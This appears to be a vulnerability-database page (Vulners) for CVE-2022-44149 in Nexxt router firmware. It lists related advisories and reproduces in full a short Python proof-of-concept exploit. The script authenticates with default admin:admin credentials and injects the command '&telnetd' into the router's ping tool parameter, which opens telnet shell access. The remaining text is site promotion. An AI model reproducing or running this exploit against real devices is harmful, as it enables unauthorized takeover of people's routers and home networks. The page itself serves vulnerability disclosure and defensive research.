| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
| Nexxt Router Firmware 42.103.1.5095 Remote Code Execution Exploit | 4 Jan 202300:00 | – | zdt | |
| Nexxt Router Firmware 42.103.1.5095 - Remote Code Execution (Authenticated) Exploit | 2 Apr 202300:00 | – | zdt | |
| CVE-2022-44149 | 6 Jan 202320:20 | – | circl | |
| Nexxt Router 操作系统命令注入漏洞 | 4 Jan 202300:00 | – | cnnvd | |
| CVE-2022-44149 | 6 Jan 202300:00 | – | cve | |
| CVE-2022-44149 | 6 Jan 202300:00 | – | cvelist | |
| Nexxt Router Firmware 42.103.1.5095 - Remote Code Execution (RCE) (Authenticated) | 1 Apr 202300:00 | – | exploitdb | |
| CVE-2022-44149 | 6 Jan 202317:15 | – | nvd | |
| CVE-2022-44149 | 6 Jan 202317:15 | – | osv | |
| Authentication flaw | 6 Jan 202317:15 | – | prion |
`# Exploit Title: Nexxt Router Firmware 42.103.1.5095 - Remote Code Execution (RCE) (Authenticated)
# Date: 19/10/2022
# Exploit Author: Yerodin Richards
# Vendor Homepage: https://www.nexxtsolutions.com/
# Version: 42.103.1.5095
# Tested on: ARN02304U8
# CVE : CVE-2022-44149
import requests
import base64
router_host = "http://192.168.1.1"
username = "admin"
password = "admin"
def main():
send_payload("&telnetd")
print("connect to router using: `telnet "+router_host.split("//")[1]+ "` using known credentials")
pass
def gen_header(u, p):
return base64.b64encode(f"{u}:{p}".encode("ascii")).decode("ascii")
def send_payload(payload):
url = router_host+"/goform/sysTools"
headers = {"Authorization": "Basic {}".format(gen_header(username, password))}
params = {"tool":"0", "pingCount":"4", "host": payload, "sumbit": "OK"}
requests.post(url, headers=headers, data=params)
if __name__ == '__main__':
main()
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation